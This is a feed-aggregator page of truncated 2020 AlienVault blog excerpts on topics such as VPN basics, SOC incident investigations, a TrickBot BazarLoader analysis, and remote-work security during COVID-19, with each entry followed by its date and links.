Unlike proxy networks such as Tor, VPNs shouldn't noticeably slow down your internet traffic under usual circumstances. But some VPNs are faster than others, and one of the most important factors is how many VPN clients are using a VPN server at any given time.

A VPN connection usually works like this. Data is transmitted from your client machine to a point in your VPN network. The VPN point encrypts your data and sends it through the internet. Another point in your VPN network decrypts your data and sends it to the appropriate internet resource, such as a web server, an email server, or your company's intranet. Then the internet resource sends data back to a point in your VPN network, where it gets encrypted. That encrypted data is sent through the internet to another point in your VPN network, which decrypts the data and sends it back to your client machine. Easy peasy!

Types of VPN technologies

Different VPNs can use different encryption standards and technologies.
Here's a quick list of some of the technologies that a VPN may use:

Point-to-Point Tunneling Protocol: PPTP has been around since the mid 1990s, and it's still frequently used. PPTP in and of itself doesn't do encryption. It tunnels data packets and then uses the GRE protocol for encapsulation. If you're considering a VPN service which uses PPTP, you should keep in mind that security experts such as Bruce Schneier have found the protocol, especially Microsoft's implem
2020-05-31T11:00:00+00:00
https://feeds.feedblitz.com/~/625800778/0/alienvault-blogs~Explain-how-VPN-works
www.secnews.physaphae.fr/article.php?IdArticle=1745932

AlienVault Blog - AlienVault is a major defense actor in IOCs
How malware mimics the spread of COVID-19

According to the CDC, “A pandemic is a global outbreak of disease. Pandemics happen when a new virus emerges to infect people and can spread between people sustainably. Because there is little to no pre-existing immunity against the new virus, it spreads worldwide.”

Enter COVID-19

COVID-19 is the name of the disease caused by the novel coronavirus, SARS-COV-2. SARS-COV-2 spreads from person to person, through droplets or aerosols, by entering the nose, mouth, or eyes. Aerosol spread is particularly infectious, because it means that an asymptomatic person can spread the disease just by talking, and the virus particles can live in the air up to three hours. When you become infected by SARS-COV-2, you have COVID-19 (the disease state), even if you are asymptomatic.

Stopping the spread

As COVID-19 spread around the world, “hot-spots” developed in China, then Italy and other parts of Europe, followed by New York City. Social distancing became a primary means of mitigating the spread. Countries like South Korea and New Zealand implemented vast testing protocols early and began contact tracing, so that huge parts of society did not have to shut down for long periods of time.
Time to contrast the COVID-19 pandemic with malware.

What is malware?

Malware is an abbreviation of “malicious code.” NIST defines malware as “hardware, firmware, or software that is intentionally includ
2020-05-27T11:00:00+00:00
https://feeds.feedblitz.com/~/625297562/0/alienvault-blogs~How-malware-mimics-the-spread-of-COVID
www.secnews.physaphae.fr/article.php?IdArticle=1736073

AlienVault Blog - AlienVault is a major defense actor in IOCs
Stories from the SOC - System compromise with lateral movement

Image 1 - Initial Alarm

Observing the initial alarm, the first event captured was an internal IP out-calling to a known malicious C2 IP (208[.]100[.]26[.]245). This simple event is an initial clue into the internal system potentially being compromised. A hasty review could suggest that the alarm could be closed out as auto-mitigated, given that we’re observing that the session had been denied. But a good analyst should dig a little deeper in order to confirm that no persistent threat remains within the internal system that tried to out-call the malicious C2 IP.

Expanded Investigation

Events Search

Image 2 - Pivot on IP/Events

In order to further investigate the alarm, we dropped down to the child server/customer deployment to pivot on events logged by the internal IP (asset 1), in order to correlate/identify any suspicious activity observed within the internal system. The analyst should take full advantage of the visibility into the different data sources compatible with USM Anywhere in order to build a more complete profile of the traffic being generated by the asset in question. In the alarm/event, we observed firewall and endpoint events associated with the internal IP. This indicates that the internal IP/asset was undertaking activities that were being blocked/denied by these two security tools. Further investigation should be undertaken.
IOC - Malicious C2 server:

Reviewing the different endpoint and firewall logs, we confirmed that the internal system was in fact compromised and observed an attacker attempting malicious lateral movement. Specifically, they were trying to access port 445 (SMB) and attempt a brute force authentication against another internal asset. As seen in the screenshot below, event ID 6045 was generated and indicates an "SMB Brute Force Attack" with threat severity "Critical".

Image 3 - Lateral Movement

Reviewing for Additional Indicators

The agent installed on the compromised endpoint was able to give deeper insights into the actual system, such as services running, open ports, and installed software. By analyzing the enriched data reporting back from the agent and previous scans, the compromised system had SMB port 445 open and was running an EOL version of Windows XP. This indicates that no Microsoft security updates had been installed and some of the most exploitable vulnerabilities, such as BlueKeep, affecting SMB over IP were surely to be found on the compromised system. This evidence further confirmed the asset as a probable entry point for the compromise and built the beginnings of our remediation and containment recommendations.

Cyber kill chain

Referencing the 
2020-05-26T11:00:00+00:00
https://feeds.feedblitz.com/~/625198716/0/alienvault-blogs~Stories-from-the-SOC-System-compromise-with-lateral-movement
www.secnews.physaphae.fr/article.php?IdArticle=1736074

AlienVault Blog - AlienVault is a major defense actor in IOCs
Stories from the SOC - System compromise with lateral movement
2020-05-26T11:00:00+00:00
https://feeds.feedblitz.com/~/625198716/0/alienvault-blogs~Stories-from-the-SOC-System-compromise-with-ateral-movement
www.secnews.physaphae.fr/article.php?IdArticle=1734470

AlienVault Blog - AlienVault is a major defense actor in IOCs
TrickBot BazarLoader In-Depth

@pancak3lullz) and Vitali Kremez (@VK_Intel) posted a Tweet regarding two new TrickBot modules aptly named “BazarLoader” and “BazarBackdoor” after attempted Command and Control (C2) communications with the Emercoin DNS (EmerDNS) .bazar domains. EmerDNS is desirable for attackers because it is a distributed blockchain that is decentralized, cannot be censored, and cannot be altered, revoked or suspended by any authority. Alien Labs’ automated malware analysis engine had picked up these samples a few days earlier (e.g. 7c93d9175a38c23d44d76d9a883f7f3da1e244c2ab6c3ac9f29a9c9e20d20a5f). BleepingComputer posted a blog with input from Vitali Kremez regarding a phishing campaign distributed through the Sendgrid email marketing platform delivering COVID-19 lures that ultimately led to the TrickBot BazarBackdoor. The purpose of this blog is to provide additional technical details and an in-depth study of the signed TrickBot BazarLoader.
Background

Since TrickBot was discovered in 2016 it has been involved in information stealing, credential theft, ransomware, bitcoin mining, and loading other common crimeware malware as a first or second stage loader. For initial access as a first stage loader it typically accomplishes its objective through spear phishing links (T1192) or spear phishing attachments (T1193) using macro-enabled Microsoft Office files. As a second stage payload and Dynamic Link Library (DLL) it is frequently loaded by Emotet. To a lesser extent TrickBot has been loaded by the Ostap JavaScript Downloader and Buer Loader. In higher priority, higher profile TrickBot Anchor campaigns that target enterprises, PowerTrick and more_eggs/TerraLoader have been used to load other frameworks. TrickBot has recently added a Remote Desktop Protocol (RDP) brute force scanner module, an Active Directory (AD) harvesting module, and the mexec executor module. There are some indications that TrickBot may be moving away from their mshare, mworm, and tabDll modules for retrieving payloads from URLs in favor of the “nworm
2020-05-19T12:00:00+00:00
https://feeds.feedblitz.com/~/624418298/0/alienvault-blogs~TrickBot-BazarLoader-InDepth
www.secnews.physaphae.fr/article.php?IdArticle=1718068

AlienVault Blog - AlienVault is a major defense actor in IOCs
Disruption on the horizon

https://www.businessinsider.com/7-emerging-technologies-that-cybersecurity-experts-are-worried-about-2019-10#quantum-computing-could-easily-crack-encryption-2). State sponsored threat actors will have access to such platforms very early on (and likely already do). However, since broader access to such computing platforms will likely be made available in the cloud, other threat actor groups will be able to utilize these platforms sooner than you might think.
Given an organization’s compliance concerns, the risk posed to legacy encryption solutions for data at rest and in transit will likely require updates to security policies and requirements for how data is encrypted and potentially where encrypted data resides.

Even at a high level, this thought exercise illustrates how innovations can impact the technical and operational environments, but in this, not all businesses are created equal. The degree of disruption caused by a technology innovation, or combination of innovations, is both industry dependent and business specific. Revisiting the music industry example, the rise of compressed digital music formats when c
2020-05-18T12:00:00+00:00
https://feeds.feedblitz.com/~/624331600/0/alienvault-blogs~Disruption-on-the-horizon
www.secnews.physaphae.fr/article.php?IdArticle=1716046

AlienVault Blog - AlienVault is a major defense actor in IOCs
The importance and security concerns of staying connected during the COVID-19 pandemic

The COVID-19 pandemic sweeping the globe has effectively put a stop to the bulk of face-to-face interactions. With social distancing and shelter-in-place orders in effect, people are stuck at home and relying on the Internet not only as a tool for communication and entertainment but as their only way to earn money during this hectic and uncertain time. With this new and unexpected reliance on connectivity, both companies and consumers should take extra precautions in ensuring that their data is protected. Cybercriminals are using this chaotic situation to try to obtain sensitive materials.

Online Access Is More Important Than Ever

The COVID-19 pandemic has left millions unemployed or working exclusively from home without warning or time for preparation. Fortunately, many Internet providers are offering low-cost options and waiving late payment fees to ease the financial burden on those who are stuck at home without gainful employment.
Regardless of whether people are working from home or not, they still rely on the Internet for socialization and entertainment, since both of those “in-person” options have been taken away unceremoniously. As more and more people find themselves using their Internet connections for work and leisure during their time indoors, solid and reliable service has become vital for many. Outages could have potentially disastrous results, not only for individuals but for entire companies and their workforces. Everyone has now been moved exclusively online. This situation has put tremendous pressure on the Internet infrastructure throughout the world and has heightened the need for cybersecurity measures across the board. Whether working from home or simply using the Internet for entertainment purposes, the increased number of people who are online means that there are more opportunities to fall prey to cyber-attacks. It is important for those who find themselves spending significantly more time online to exercise increased caution in the coming weeks and months to protect themselves and their workplaces from criminals who seek to do serious harm.

How Cybercriminals Are Taking Advantage

Working from home, while being a great opportunity for many to continue making money, has also introduced many workers to online work-related software for the first time. This inherently increases the risk of cyber-attacks and phishing schemes due to increased online traffic from people who may not be well-versed in cybersecurity practices. Phishing schemes can prey on anyone who uses the internet. They work by getting users to click on malicious links or documents. The risk of this has increased during the COVID-19 pandemic due to the sheer number of e-mails being sent to and from employers and employees, providing the opportunity for cybercriminals to prey on those who aren’t used to practicing basic cybersecurity as part of their daily work.
With so many workers turning to their smart devices to work, mobile application security is paramount to the cybersecurity of both personal files and sensitive data that they might have access to through work. While many people ar
2020-05-14T12:00:00+00:00
https://feeds.feedblitz.com/~/623955074/0/alienvault-blogs~The-importance-and-security-concerns-of-staying-connected-during-the-COVID-pandemic
www.secnews.physaphae.fr/article.php?IdArticle=1709306

AlienVault Blog - AlienVault is a major defense actor in IOCs
Why cybersecurity In the healthcare sector needs improvement

Photo by Hush Naidoo on Unsplash

This blog was written by an independent guest blogger.

A recent attack on a hospital in Brno, Czech Republic (a COVID-19 testing center) showed the extent to which weaknesses in a health center’s cybersecurity system can endanger the lives of patients. During this attack, patients had to be redirected to other hospitals and vital surgeries were postponed - all during a time in which vital testing needed to be carried out and releases needed to be sped up. A study published in the journal Technological Health Care by CS Kruse et al. has found that “The healthcare industry is a prime target for medical information theft as it lags behind other leading industries in securing vital data.” It is vital, warn the researchers, to invest time and funding in protecting healthcare technology and in ensuring the confidentiality of patient information.

Time is of the essence in healthcare

Cybersecurity attacks interfere with vital work undertaken in the health sector - for instance, when ransomware makes crucial data inaccessible. Cyber attacks also lengthen already excessive waiting times, clogging systems during health crises such as the current COVID-19 pandemic.
A recent article in The Guardian revealed that in many American hospitals, health insurance authorization can take days, leaving patients stuck in the hospital at a time when beds are needed. Some groups in particular - including military veterans - have coverage that can take time to receive authorization for. This is because not all vets are covered by TRICARE or the Veterans Health Care Program. If they have a high enough disability factor, they may be enrolled in different benefits plans than those without disabilities. Bureaucratic requirements can also vary depending on the institution and its verification requirements.

What are the most common attacks on the healthcare sector?

Attacks on hospitals and other centers that obtain and record data include ransomware attacks and (currently) COVID-19 themed phishing attacks. Healthcare professionals such as nurses and doctors - who have access to a wide array of data - are often the target of phishing scams. The new importance of remote work has also led to big weaknesses in security systems, with individual home systems often lacking the safety features that in-hospital systems rely on daily. Threats also include cloud threats owing to the lack of proper encryption, misleading websites that are similar to trustworthy sites, employee errors (weak passwords and failure to comply with security protocol), and blind spots in encryption systems.

Crucial steps for health organizations

To combat these attacks, healthcare organizations need to adopt optimal centralized security with enhanced detection and response. They also need to review current security systems to spot potential weaknesses and take into account all aspects of current operations - including employees’ wearable devices, smartphones, cloud sharing systems, and the like.
Health
2020-05-13T12:00:00+00:00
https://feeds.feedblitz.com/~/623845248/0/alienvault-blogs~Why-cybersecurity-In-the-healthcare-sector-needs-improvement
www.secnews.physaphae.fr/article.php?IdArticle=1706752

AlienVault Blog - AlienVault is a major defense actor in IOCs
The relationship between security maturity and business enablement

Now more than ever, organizations globally want to better understand, manage, and minimize security risks. To achieve this, security leaders should be regularly assessing their processes and programs to gain a sense of their organization’s security maturity, where gaps exist, and what can be done to improve security posture.

In March 2020, AT&T Cybersecurity and Enterprise Strategy Group (ESG) completed a benchmark survey aimed at helping organizations understand what a mature cybersecurity program looks like and how that maturity influences security and business outcomes. Results from the 500 security professionals surveyed on their processes, policies, and controls were mapped into the NIST Cybersecurity Framework’s (CSF) five foundational cybersecurity functions: identify, protect, detect, respond, and recover. The goal of this unique research was to validate if — and to what degree — organizations in better alignment with best practices prescribed by the NIST CSF can operate more secure environments and better enable their businesses. This was accomplished through the creation of a data-driven model that segments respondents into three levels of cybersecurity maturity:
Emerging organizations
Following organizations
Leading organizations

By comparing survey results across these levels, the model allows us to use data to quantify the differences in security and business outcomes that exist as maturity level improves. One of the more interesting findings that came out of the research (and quite a hopeful one) is that cybersecurity maturity is not directly dependent on company size.
One might assume only the largest organizations, with the most resources, would be able to implement a cybersecurity program sophisticated enough to achieve “leader” status. However, the research shows that the median company size is identical across all three maturity levels – “leading”, “following”, and “emerging.” The fact that there is no correlation between company size and maturity level indicates to us that doing cybersecurity well is less a function of resources and more a function of thoughtful consideration, planning, and organizational culture. While technology and staff investments matter, the research indicates that organizations of any size can achieve a highly mature cybersecurity program. To read these research findings, download the full report. There's also a nice infographic. In addition to our research, AT&T Cybersecurity and ESG have developed a free self-assessment tool that enables organizations to measure their security maturity based on the survey’s benchmark data and the NIST cybersecurity framework. Take the free maturity assessment.

Published: 2020-05-12T12:00:00+00:00 | Feed: https://feeds.feedblitz.com/~/623751342/0/alienvault-blogs~The-relationship-between-security-maturity-and-business-enablement | Article: www.secnews.physaphae.fr/article.php?IdArticle=1704939 | Tags: Tool, Guideline

AlienVault Blog - Stories from the SOC - Office365 Credential Abuse

[Figure 1 - Initial Alarm]

Expanded investigation

Alarm Detail

Also included in the alarm details is the associated MITRE ATT&CK® rule attack ID, which afforded the ability to efficiently and expeditiously gather relevant information about this potential attempt to compromise the customer’s Office 365 account.
The synopsis for this attack technique is defined as the attempt to “… steal the credentials of a specific user or service account using Credential Access techniques or capture credentials earlier in their reconnaissance process…”

Correlation Rule Logic

[Figure 2 - Correlation Logic]

Correlated Events

[Figure 3 - U.S. Login Event]

Simultaneous logins were detected from both the United States and a foreign country, generating two events, like the one pictured above, with different source countries. These successful logins occurred within two minutes of one another; thus, triggering the Credential Abuse alarm.

Response

Building the investigation

The successful login attempts’ origin and volume deriving from the United States fall within the baseline activity for this user. However, there was a sudden surge in attempts from a foreign country that aligned with the timeline of when this account had appeared to have been successfully compromised.

Customer interaction

In order to effectively articulate the login irregularities to the customer, our team did a retrospective query to analyze successful authentication attempts for this particular Office365 user. Utilizing advanced query capabilities within USM Anywhere

Published: 2020-05-11T12:00:00+00:00 | Feed: https://feeds.feedblitz.com/~/623668652/0/alienvault-blogs~Stories-from-the-SOC-Office-Credential-Abuse | Article: www.secnews.physaphae.fr/article.php?IdArticle=1703027 | Tags: Threat

AlienVault Blog - Remote workers making mobile management and security first priority

assess and adapt for resiliency across their entire ecosystem, especially their remote and mobile workforces. Unified endpoint security should be one of the top priorities. Hearing the term “endpoint,” one primarily thinks of a laptop or desktop. However, endpoints are really anything connected to the company network or the internet.
This includes mobile phones, smartphones, tablets, servers, and even specialized hardware such as Point of Sale (POS) systems and other Internet of Things devices. And in this current environment, it also means corporate-owned and bring your own devices (BYOD) as well as various operating systems. Ultimately, this suggests that “endpoint security” encompasses many unique variables that need to be managed. Implementing an industry-leading Unified Endpoint Management (UEM) solution is paramount given these circumstances. UEMs onboard, deploy, configure, and enroll devices so that the workforce can get up and running quickly. They help devices stay compliant with industry- and company-mandated regulations. UEMs today are also able to do advanced IT management actions like view or remote in on a device as if they had the device in their hand to help troubleshoot issues. All key capabilities when the IT manager can’t be in the same room as the device.

UEM describes only the management aspects of unified endpoint security. Businesses must also consider the security elements needed to protect endpoints from advanced cyber threats. Endpoints have a huge target on them for cyber criminals with 70% of breaches originating on the endpoint. Cyber criminals recognize that endpoints are an effective way to launch an attack. Recent mobile device testing revealed up to 25% of employees are fooled into clicking phishing links. Although businesses recognized

Published: 2020-05-07T12:00:00+00:00 | Feed: https://feeds.feedblitz.com/~/623387468/0/alienvault-blogs~Remote-workers-making-mobile-management-and-security-first-priority | Article: www.secnews.physaphae.fr/article.php?IdArticle=1696671 | Tags: Malware, Threat, Guideline

AlienVault Blog - Recalling the ILOVEYOU worm from 20 years ago

In these days of uncertainty caused by the COVID-19 biological virus, fear is a button begging to be pushed.
These fears make it more likely for someone to click on an attachment or link claiming to provide updates and warnings about the situation. So please stay alert for those COVID-19, Zoom™, Teams, and other work-from-home themed phishing attempts and let’s avoid creating any new anniversaries for worldwide malicious events.

Published: 2020-05-06T18:00:00+00:00 | Feed: https://feeds.feedblitz.com/~/623337734/0/alienvault-blogs~Recalling-the-ILOVEYOU-worm-from-years-ago | Article: www.secnews.physaphae.fr/article.php?IdArticle=1694965 | Tags: Ransomware, Threat

AlienVault Blog - Balancing security and flexibility with a remote workforce

seven percent of U.S. workers regularly enjoyed the option of working from home. Well accustomed to the nature of remote work, these individuals were equipped with stable internet connections, collaboration and communication tools, and security technologies that helped them excel from their home offices. As concerns regarding the spread of COVID-19 grew, nations around the world opted to enforce social distancing guidelines to prevent the infectious disease from spreading. In response, companies of all sizes have been forced to embrace remote work without much time to plan ahead. Some businesses have shifted to as much as one hundred percent of their employees working from home. As all parties involved adjust to this new way of working, critical concerns regarding the security of data and systems have surfaced and must be addressed to prevent cyber breaches. Here are five tips every enterprise should consider for better security of remote workers:

Ensure your information security policy covers remote work use cases

In companies unaccustomed to remote work, information security policies tend to be written under the assumption that employees are on site. This has led to gaps in guidance on how workers should maintain the security of data and applications while working remotely.
The sudden shift to home office setups requires that policies and procedures be established or updated to account for this new reality. Examples of relevant remote security policy components include, but are not limited to, mobile device management, access control, acceptable use, and more. For example, a Mobile Device Management (MDM) policy should describe the controls required to secure, monitor, and manage mobile devices used by employees. An access control policy is another common policy that already exists in most companies; however, it may not have been written with remote work in mind. This policy should include guidance on granting, monitoring, and terminating remote access for employees and third parties.

[Photo: VPN at home. Photo by Dan Nelson on Unsplash]

Address security risks associated with employees working on personal devices

Some employees are now required to use personal devices to access sensitive information for work-related tasks. This increases the risk of potential data loss or leakage, and also makes it challenging to maintain visibility into employee actions. Defining a Bring Your Own Device (BYOD) strategy is an essential step in enhancing company security when employees may begin using their personal devices for business purposes. The policy should include guidelines on the minimum required device security controls, acceptable use cases, prohibited actions, and information on any company-sanctioned security tools that can be used to conduct business securely. It’s also important to discuss any employee rights or privacy implications when managing personal user devices that are connected to the corporate network. Lastly, the strategy should include plans for addressing lost or stolen personal devices that may have included sensitive company information.
Get a handle on growing third party risks

A

Published: 2020-05-06T12:00:00+00:00 | Feed: https://feeds.feedblitz.com/~/623317512/0/alienvault-blogs~Balancing-security-and-flexibility-with-a-remote-workforce | Article: www.secnews.physaphae.fr/article.php?IdArticle=1694220 | Tags: Malware, Guideline

AlienVault Blog - 5 defensive COVID-19 actions IT managers can take now

419,643 indicators of compromise (IOC) related to COVID-19, including a 2,000% month-over-month increase from February to March. Cybercriminals are taking advantage of the shift to remote working, increasing their volume of attacks by nearly 40% in the last month. Home routers have been hijacked. COVID-19-themed phishing attacks have jumped 500%. And most of the 4,000 new COVID-19 domains are suspected of criminal intent. Companies large and small are in a bad spot on this one. Asking staff to come to the office could worsen the health crisis. Having them work at home creates a vastly increased attack surface that cybercriminals can easily exploit. And in the meantime, trying to highly secure every employee’s home is about every IT Manager’s worst nightmare. I have the advantage of working for a large company, where there is not much difference between working at the office or at home. But for most, the new remote work environment ushers in an entirely new security landscape overnight. Long term, this means acceleration of cloud security and zero trust models. But for the short term, here are a few suggestions that I’d like to offer. These may be basic concepts, but in security, the basics matter most, and they are often easy to implement.

1. Teach staff how to “socially distance” their home networks.

When you think about who is using a home WiFi network in an average American family, it is unlikely that many of them are particularly cyber-savvy.
If one or more adult members of a typical family are connecting to the office by remote these days, that leaves gaps for children, visitors and non-working adults who may also be accessing the internet via that home network. The first and easiest “fix” that staff should do is to partition their home internet access. They should try to avoid children, their schoolmates, and even adult friends playing video games, checking email, and downloading movies on the same network connection that is used to log into the office. This opens the door to a tidal wave of unknown vulnerabilities. Staff should also avoid logging in on the same connection utilized by home IoT devices such as smart thermostats, wireless doorbell cameras, and virtual personal assistants. If you need any convincing of the vulnerability of those sorts of endpoints, read this article. Isolating a home network connection no longer requires particularly deep IT skills. There are many home and small office routers at around the $100 price point which offer VLAN support of one type or another. Most WiFi kits offer the ability to set up a “guest” network. IT departments can provide easy, step-by-step instructions to employees working remotely on how to set this up on common routers and impress upon all managers the import

Published: 2020-05-04T12:00:00+00:00 | Feed: https://feeds.feedblitz.com/~/623166314/0/alienvault-blogs~defensive-COVID-actions-IT-managers-can-take-now | Article: www.secnews.physaphae.fr/article.php?IdArticle=1690016 | Tags: Malware, Vulnerability, Threat, Guideline

AlienVault Blog - AT&T Cybersecurity receives Frost & Sullivan award in Managed Security Services

Frost & Sullivan, that we received the 2019 Frost Radar Award for Growth, Innovation & Leadership (GIL) in the Global Managed Security Services (MSS) Market.
Frost & Sullivan’s global team of analysts and consultants recognized our achievements in innovating and creating new products and solutions that serve ever-evolving customer needs. The criteria analyzed by Frost & Sullivan to determine the award were innovation, scalability, research and development, product portfolio, mega trends leverage, customer alignment as well as business factors including market share, revenue growth, growth pipeline, vision and strategy, sales and marketing. In particular, the analysts noted AT&T Cybersecurity as one of the most significant contributors to the rapid growth of the security market, as well as the overall pace of technological innovation.

This recognition is noteworthy. It validates our years of experience in helping to protect network assets and our deep industry expertise; it supports our approach to helping enterprises fight the complexity and cost of cybercrime that is integrated, automated, and orchestrated with the right people, process, and technology. With our portfolio of managed security services, including AT&T Managed Threat Detection and AT&T Global Security Gateway, organizations can help to reduce business risk and achieve cybersecurity efficiency within budget. And, the Frost Radar Award demonstrates we are at the forefront of the changing cybersecurity landscape and the increasing adoption of MSS.

There are several reasons for this MSS growth. More organizations are realizing fighting cybercrime is not their core competency, and they don’t have the resources to tackle it; especially during the current global health crisis. It is difficult to evaluate, adopt, implement, and actively manage up to 75 or more different cybersecurity solutions needed to meet today’s security needs. Also, transitioning to next-generation services such as 5G, IoT and Edge Computing, as well as cloud-based business models, adds to the complexities of managing cybersecurity as IT environments become more complicated.
Ultimately, we understand cybersecurity is a journey, not a destination. Our mission is to be the trusted advisor for enterprises on the road to cybersecurity resiliency, making it safer for them to innovate. For more information on our Frost Radar award, visit our resource center.

Published: 2020-04-30T12:00:00+00:00 | Feed: https://feeds.feedblitz.com/~/622803148/0/alienvault-blogs~ATampT-Cybersecurity-receives-Frost-amp-Sullivan-award-in-Managed-Security-Services | Article: www.secnews.physaphae.fr/article.php?IdArticle=1683411 | Tags: Threat, Guideline

AlienVault Blog - Have you started working from home? Secure your endpoints!

Published: 2020-04-29T12:00:00+00:00 | Feed: https://feeds.feedblitz.com/~/622708402/0/alienvault-blogs~Have-you-started-working-from-home-Secure-your-endpoints | Article: www.secnews.physaphae.fr/article.php?IdArticle=1681636 | Tags: Malware, Patching

AlienVault Blog - Working from home? Use the spare time for professional development

Published: 2020-04-28T12:00:00+00:00 | Feed: https://feeds.feedblitz.com/~/622619428/0/alienvault-blogs~Working-from-home-Use-the-spare-time-for-professional-development | Article: www.secnews.physaphae.fr/article.php?IdArticle=1679420 | Tags: none

AlienVault Blog - Stories from the SOC - Web Server Attack

Apache Struts Dynamic Method Invocation Remote Code Execution events. As detailed within the image below, this attack intent is associated with the Delivery & Attack phase of the Cyber Kill Chain®.

[Figure 1 - Initial Alarm]

Alarm Detail

Also included in the alarm details is the associated MITRE ATT&CK® rule attack ID, which afforded the ability to efficiently and expeditiously gather relevant information about this particular attempt on the customer’s system.
The synopsis for this attack technique is defined as the “… use of software, data, or commands to take advantage of a weakness in an Internet-facing computer system or program in order to cause unintended or unanticipated behavior. The weakness in the system can be a bug, a glitch, or a design vulnerability.” To better understand the vulnerability profile of the asset in question, I executed an authenticated vulnerability scan within USM Anywhere. The results indicated several Apache HTTP server vulnerabilities. Following the completion of my reconnaissance efforts, I presented the actionable information to the customer.

Response

[Figure 2 – Analyst Comments]

Customer Response(s)

Two members of our Customer’s staff reviewed the analysis that I provided, confirmed my trepidations pertaining to the active vulnerabilities, and shared the subsequent steps to be taken to remediate this activity. The NAT was removed, and the Public IP was discontinued. The customer’s staff provided supplementary detail about the exposed and vulnerable system and the means by which he resolved continuing activity.
The analyst indicated the targeted device was a digital video recorder (DVR) system that physically resided within one of the Customer’s warehouses and then outlined the actions taken to mitigate the risk:

- The publication rule of the Watchguard in the warehouse was eliminated
- The secondary public IP from the Watchguard configuration was removed
- The public IP of origin of the attack on the Watchguard was blocked
- Geolocation blocking from the foreign country to our entire network in the region was enabled
- The DVR was isolated unti

Published: 2020-04-27T12:00:00+00:00 | Feed: https://feeds.feedblitz.com/~/622532746/0/alienvault-blogs~Stories-from-the-SOC-Web-Server-Attack | Article: www.secnews.physaphae.fr/article.php?IdArticle=1677672 | Tags: Vulnerability, Threat, Guideline

AlienVault Blog - Why cybersecurity needs a seat at the table

Published: 2020-04-23T12:00:00+00:00 | Feed: https://feeds.feedblitz.com/~/622229072/0/alienvault-blogs~Why-cybersecurity-needs-a-seat-at-the-table | Article: www.secnews.physaphae.fr/article.php?IdArticle=1671587 | Tags: Guideline

AlienVault Blog - Donating while you sleep

interesting times. Even the most hard-core introverts have noticed the value of human interaction. It is how our species has survived. One of the biggest challenges of our new, isolated existence is our sense of Locus of Control. One common sentiment during times of uncertainty is the desire to help. Most people want to help, but not all have the means to do so. Fortunately, there is a way to help that costs no money at all. Have you heard of distributed computing power? This is where a group of computers are given a task that is too great for a single computer to solve. The computer is used for the distributed computing task while the CPU is idle.
Many folks never turn off their computers, so there are plenty of hours when the processor is doing nothing; just sitting, and awaiting some instruction. There is an effort underway to combat the COVID-19 virus using distributed computing. It is known as Folding@Home.

I first became aware of crowdsourced distributed computing back when it was being used in the Search for Extraterrestrial Intelligence, known as the SETI experiment. I chuckled that anyone would waste any computing cycles for such a trivial pursuit. Recently, however, in a Twitter post by Lesley Carhart, I learned of the existence of the Folding@Home project. The distributed computing game has changed dramatically, finding uses in many disease research endeavors. Of course, I was skeptical about the entire thing at first. As I researched it a bit, it appears to be legitimate. The involvement of many other folks in the InfoSec community added credibility to the project.

Currently, the aim of the Folding@Home initiative is to explore protein behaviors to seek therapies for the COVID-19 virus. You can read about protein chains, and how their behaviors affect all aspects of life on the FoldingAtHome.org web site. However, if you do not want to read all about it, I can assure you that you have seen protein folding behavior throughout your life. For example, just drop an egg into a hot frying pan, and you are seeing proteins change their shape in real-time. The understanding of protein behaviors could hold the cure that science is seeking.

You do not need a supercomputer to participate. The idea is that you become part of a larger computer’s processing power by donating your unused computing time. You can grab the software here. There are versions for all operating systems, and the installation is fast, and easy.
I have mine running on an old laptop on which I installed a copy of Linux Mint.

[Screenshot: folding@home]

As reported on April 8th, the Folding@Home effort had achieved more than an exaFLOP of computing power. This is incredible, and if you are part of the collective that helped to reach that milestone, I sincerely thank and a

Published: 2020-04-22T12:00:00+00:00 | Feed: https://feeds.feedblitz.com/~/622144418/0/alienvault-blogs~Donating-while-you-sleep | Article: www.secnews.physaphae.fr/article.php?IdArticle=1669584 | Tags: none

AlienVault Blog - How Blockchain could transform smart-home privacy tech

increasing cyberattacks.

Blockchain: Supercharged Data Protection

Here’s the funny thing. Though blockchain revolutionary technology is changing the way our financial system is structured, it’s not actually a good solution (yet, more on that later) to IoT privacy issues. At this point in time, blockchain is good for IoT security but bad for privacy. To the layman, this statement might seem contradictory and that’s because the tech media does a rather poor job at explaining the difference between privacy and protection.

Protection for the Internet of Things

For anyone even remotely familiar with technology, the term Internet of Things (IoT) is a recognizable commodity. This describes the millions and soon to be billions of smart devices in addition to your mobile phone or laptop that are connected to the internet. We’re talking about the aforementioned refrigerator, security systems, smart doorbells, remote access climate control, and many more. The problem that has arisen is that no one really planned for the IoT. It just happened. The trend in the past few years has been to move IoT network data flow to the cloud and benefit from that environment’s greatly increased security.
But at the same time, there remains the inherent limitation of so many internet capable devices built with a hodge-podge of operating systems and security capabilities. Device manufacturers eschewed any standards and did their own thing. It wasn’t long before hackers realized that these devices offered a backdoor path (thanks to laughably easy to defeat security protocols) to attack any company or individual who installed a smart device on their network. Home networks, in particular, have been very easy targets for the bad guys.

A Blockchain-powered, multiple VPN solution

To date, security experts typically recommend consumers install a virtual private network (VPN) on their router as protection against basic cyber security threats. While the encryption and IP address rerouting offered by a VPN makes it exponentially harder to crack your home network, there’s a trust problem with the average VPN. While the majority of service providers are committed to the idea of absolute privacy of your personal data, the reality remains that your connection passes through their server

Published: 2020-04-21T12:00:00+00:00 | Feed: https://feeds.feedblitz.com/~/622057472/0/alienvault-blogs~How-Blockchain-could-transform-smarthome-privacy-tech | Article: www.secnews.physaphae.fr/article.php?IdArticle=1667489 | Tags: none

AlienVault Blog - Working from home - new reality for even small businesses

Federal Consumer Credit Protection Act is a big concern to this small law firm. It provides valuable safety rights for consumers. On the flip side, it puts the onus on businesses to provide that these rights are protected. Definitely something to consider in erring on the conservative side and requiring employees to work in the office for the sake of security. The main driver for requiring people to work in the office was data security. Fear of the cloud was holding them back.
Larger companies have been using cloud-based applications and allowing remote work for years – but this is not the reality for many small companies. Although this company already had great policies, including not storing information such as social security numbers of clients in their records, cloud-based applications and remote work were a bridge too far for the firm. Until Covid-19, which forced them to cross that bridge.

[Photo: bridge too far. Photo by Bjorn Snelders on Unsplash]

COVID-19 forced innovation and protecting client security to the forefront. It forced them to cross an uncomfortable bridge. They had to make the transition in literally a week. Schools were closing down and since most employees in this firm had kids, there was no option. They were fortunate to have a technical office manager who required very little third-party support from an IT contractor to make it happen. She was able to get the Office 365® suite in the cloud for everyone and set up ONEDRIVE® in a few days. While this was a tough change, there are upsides. Avoiding a 45-minute commute each way was a bonus. Working at home with small kids – wow, a challenge. But manageable. I believe COVID-19 will impact us going forward in unexpected ways. For this small law firm, once it’s proven that it works to allow employees to work from home securely, how many will change their policies even after the virus is defeated? It will be interesting to see.

Helpful ideas for small companies

